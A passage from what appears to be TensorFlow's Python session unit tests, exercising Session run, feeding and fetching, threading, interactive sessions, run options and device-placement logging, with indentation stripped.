self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
@test_util.run_v1_only('b/120545219')
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.VariableV1(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(
target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
@staticmethod
def _build_graph():
time.sleep(random.random() * 0.1)
# Do some graph construction. Try to exercise non-trivial paths.
graph = ops.get_default_graph()
gdef = None
for _ in range(10):
x = array_ops.placeholder(dtype=dtypes.float32)
with ops.colocate_with(x):
y = array_ops.placeholder(dtype=dtypes.float32)
with ops.device('/cpu:0'):
z = control_flow_ops.while_loop(
lambda x, y: x < 10, lambda x, y: (x + 1, x * y), [x, y])
with graph._attr_scope({'_a': attr_value_pb2.AttrValue(b=False)}):
gradients_impl.gradients(z, [x, y])
if gdef is None:
gdef = graph.as_graph_def()
else:
importer.import_graph_def(gdef, name='import')
@test_util.run_v1_only('b/120545219')
def testParallelRunAndSingleBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in threads:
t.start()
SessionTest._build_graph()
stop.set()
for t in threads:
t.join()
@test_util.run_v1_only('b/120545219')
def testParallelRunAndParallelBuild(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
stop = threading.Event()
def run_loop():
while not stop.is_set():
time.sleep(random.random() * 0.1)
self.assertEqual(sess.run(c), 5.0)
run_threads = [self.checkedThread(target=run_loop) for _ in range(10)]
for t in run_threads:
t.start()
build_threads = [self.checkedThread(target=SessionTest._build_graph)
for _ in range(10)]
for t in build_threads:
t.start()
for t in build_threads:
t.join()
# Let the run_threads run until the build threads are finished.
stop.set()
for t in run_threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals('versions { producer: %d min_consumer: %d }' %
(versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEqual(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEqual(len(sess.graph_def.node), 2)
self.assertAllEqual(c, 5.0)
self.assertAllEqual(d, 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEqual(len(sess.graph_def.node), 3)
self.assertAllEqual(e, 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesRegex(RuntimeError, 'The Session graph is empty.'):
sess.run([])
with self.assertRaisesRegex(RuntimeError, 'The Session graph is empty.'):
sess.run(())
with self.assertRaisesRegex(RuntimeError, 'The Session graph is empty.'):
sess.run({})
@test_util.run_v1_only('b/120545219')
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
@test_util.run_v1_only('b/120545219')
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e)
sess.close()
@test_util.run_v1_only('b/120545219')
def testMultipleInteractiveSessionsWarning(self):
# Reinitialize the global state to ensure that the expected warnings will
# be emitted.
session.InteractiveSession._active_session_count = 0 # pylint: disable=protected-access
sess = session.InteractiveSession()
sess.run(constant_op.constant(4.0)) # Run so that the session is "opened".
sess.close()
# Opening and closing interactive sessions serially should not warn.
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
sess.close()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess = session.InteractiveSession()
self.assertEqual(0, len(w))
with warnings.catch_warnings(record=True) as w:
sess2 = session.InteractiveSession()
self.assertEqual(1, len(w))
self.assertTrue('An interactive session is already active. This can cause '
'out-of-memory errors in some cases. You must explicitly '
'call `InteractiveSession.close()` to release resources '
'held by the other session(s).' in str(w[0].message))
sess2.close()
sess.close()
@test_util.run_v1_only('b/120545219')
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
@test_util.run_v1_only('b/120545219')
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/device:GPU:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [
dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool,
dtypes.complex64, dtypes.complex128
]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={
feed_t: np_array
}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={
feed_t: np_array
}))
# Also check that we can get both back.
out_v, feed_v = sess.run(
[out_t, feed_t], feed_dict={
feed_t: np_array
})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
feed_fetch_runner = sess.make_callable([out_t, feed_t], [feed_t])
out_v, feed_v = feed_fetch_runner(np_array)
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testMakeCallableOnTensorWithRunOptions(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
tensor_runner = sess.make_callable(a, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
res = tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(42.0, res)
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableOnOperationWithRunOptions(self):
with session.Session() as sess:
a = variables.Variable(42.0)
b = state_ops.assign_add(a, 1.0)
sess.run(a.initializer)
tensor_runner = sess.make_callable(b.op, accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
tensor_runner(options=run_options, run_metadata=run_metadata)
self.assertEqual(43.0, sess.run(a))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testMakeCallableWithFeedListAndRunOptions(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
tensor_runner = sess.make_callable(
a, feed_list=[ph.name], accept_options=True)
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
self.assertEqual(0, len(run_metadata.step_stats.dev_stats))
self.assertAllClose(42.0,
tensor_runner(
41.0,
options=run_options,
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testOptimizedMakeCallable(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
for _ in range(3):
callable_fn = sess._make_callable_from_options(callable_opts)
for _ in range(5):
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32)))
def testOptimizedMakeCallableWithRunMetadata(self):
with session.Session() as sess:
ph = array_ops.placeholder(dtypes.float32)
a = math_ops.add(ph, 1.0)
callable_opts = config_pb2.CallableOptions()
callable_opts.feed.append(ph.name)
callable_opts.fetch.append(a.name)
callable_opts.run_options.trace_level = config_pb2.RunOptions.FULL_TRACE
callable_fn = sess._make_callable_from_options(callable_opts)
run_metadata = config_pb2.RunMetadata()
self.assertEqual([2.0], callable_fn(np.array(1.0, dtype=np.float32),
run_metadata=run_metadata))
self.assertGreater(len(run_metadata.step_stats.dev_stats), 0)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegex(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegex(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegex(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegex(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegex(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c, c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array(
[compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(
sess.run(feed_t, feed_dict={
feed_t: c_list
}), c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [
u'\n\x01\x00', u'\n\x00\x01', u'\u26a3 unicode',
u'\U0001f60e deal with it'
]
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegex(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegex(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
@test_util.run_deprecated_v1
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.SOFTWARE_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
# in v2 mode, this len is 2
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
@test_util.run_deprecated_v1
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.SOFTWARE_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(
constant_op.constant(1.0), options=None, run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0), options=run_options, run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(
constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
# in v2 mode, this len is 2
self.assertEqual(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegex(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Input to reshape is a tensor with 4 values, '
'but the requested shape has 21'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config_pb = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config_pb)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config_pb = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config_pb) as sess:
with ops.device('/device:GPU:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.multiply(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(
d,
feed_dict={a: 1.0},
options=run_options,
run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def runTestOutputPartitionGraphs(self, sess):
run_options = config_pb2.RunOptions(output_partition_graphs=True)
a = constant_op.constant(1)
run_metadata = config_pb2.RunMetadata()
sess.run(a, options=run_options, run_metadata=run_metadata)
self.assertGreater(len(run_metadata.partition_graphs), 0)
sess.run(a, run_metadata=run_metadata)
self.assertEqual(len(run_metadata.partition_graphs), 0)
@test_util.run_v1_only('b/120545219')
def testOutputPartitionGraphsDirect(self):
self.runTestOutputPartitionGraphs(session.Session())
@test_util.run_v1_only('b/120545219')
def testOutputPartitionGraphsDistributed(self):
server = server_lib.Server.create_local_server()
self.runTestOutputPartitionGraphs(session.Session(server.target))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegex(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
@test_util.run_v1_only('b/120545219')
def testAsDefault(self):
c = constant_op.constant(37)
sess = session.Session()
with sess.as_default():
self.assertEqual(37, c.eval())
# Ensure that the session remains valid even when it is not captured.
with session.Session().as_default():
self.assertEqual(37, c.eval())
def testReentry(self):
sess = session.Session()
with self.assertRaisesRegex(RuntimeError, 'not re-entrant'):
with sess:
with sess:
pass
def testInvalidArgument(self):
with self.assertRaisesRegex(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegex(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegex(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
@test_util.run_v1_only('b/120545219')
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config_pb) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
@test_util.run_v1_only('b/120545219')
def testRegisterFetchAndFeedConversionFunctions(self):
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = math_ops.square(tensor)
fetch_fn = lambda squared_tensor: ([squared_tensor.sq], lambda val: val[0])
feed_fn1 = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_fn2 = lambda feed: [feed.sq]
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.assertRaises(ValueError):
session.register_session_run_conversion_functions(SquaredTensor, fetch_fn,
feed_fn1, feed_fn2)
with self.cached_session() as sess:
np1 = np.array([1.0, 1.5, 2.0, 2.5])
np2 = np.array([3.0, 3.5, 4.0, 4.5])
squared_tensor = SquaredTensor(np2)
squared_eval = sess.run(squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
squared_eval = sess.run(
squared_tensor, feed_dict={
squared_tensor: np1 * np1
})
self.assertAllClose(np1 * np1, squared_eval)
partial_run = sess.partial_run_setup([squared_tensor], [])
squared_eval = sess.partial_run(partial_run, squared_tensor)
self.assertAllClose(np2 * np2, squared_eval)
def testDefaultLogDevicePlacement(self):
class CaptureStderr(str):
"""Class to capture stderr from C++ shared library."""
def __enter__(self):
self._esc = compat.as_str('\b')
self._output = compat.as_str('')
self._stderr = sys.stderr
self._fd = self._stderr.fileno()
self._out_pipe, in_pipe = os.pipe()
# Save the original io stream.
self._dup_fd = os.dup(self._fd)
# Replace the original io stream with in pipe.
os.dup2(in_pipe, self._fd)
return self
def __exit__(self, *args):
self._stderr.write(self._esc)
self._stderr.flush()
self.read()
os.close(self._out_pipe)
# Restore the original io stream.
os.dup2(self._dup_fd, self._fd)
def read(self):
while True:
data = os.read(self._out_pipe, 1)
if not data or compat.as_str(data) == self._esc:
break
self._output += compat.as_str(data)
def __str__(self):
return self._output
context.set_log_device_placement(True)
if context.executing_eagerly():
with CaptureStderr() as log:
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
# Ensure if the same kernel with the same arguments is executed then its
# execution is logged.
d = a + b
else:
# Passing the config to the server, but not the session should still
# result in logging device placement.
config_pb = config_pb2.ConfigProto(log_device_placement=True)
server = server_lib.Server.create_local_server(config=config_pb)
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
d = a + b
with session.Session(server.target) as sess:
with CaptureStderr() as log:
c, d = sess.run([c, d])
self.assertEqual(c, 3)
self.assertEqual(d, 3)
# Ensure that we did log device placement.
add_executions = [l for l in str(log).splitlines() if 'AddV2' in l]
self.assertEqual(len(add_executions), 2)
@def_function.function
def fn():
a = constant_op.constant(1)
b = constant_op.constant(2)
c = a + b
d = a + b
return c, d
with CaptureStderr() as log:
c, d = self.evaluate(fn())
self.assertEqual(c, 3)
self.assertEqual(d, 3)
# Ensure that we did log device placement.
add_executions = [l for l in str(log).splitlines() if 'AddV2' in l]
self.assertEqual(len(add_executions), 2)
@test_util.run_v1_only('b/120545219')
def testLocalMasterSessionTimeout(self):
# Test that the timeout passed in a config to the session works correctly.
config_pb = config_pb2.ConfigProto(operation_timeout_in_ms=1000)
server = server_lib.Server.create_local_server()
q = data_flow_ops.FIFOQueue(1, dtypes.float32)
dequeued_t = q.dequeue()
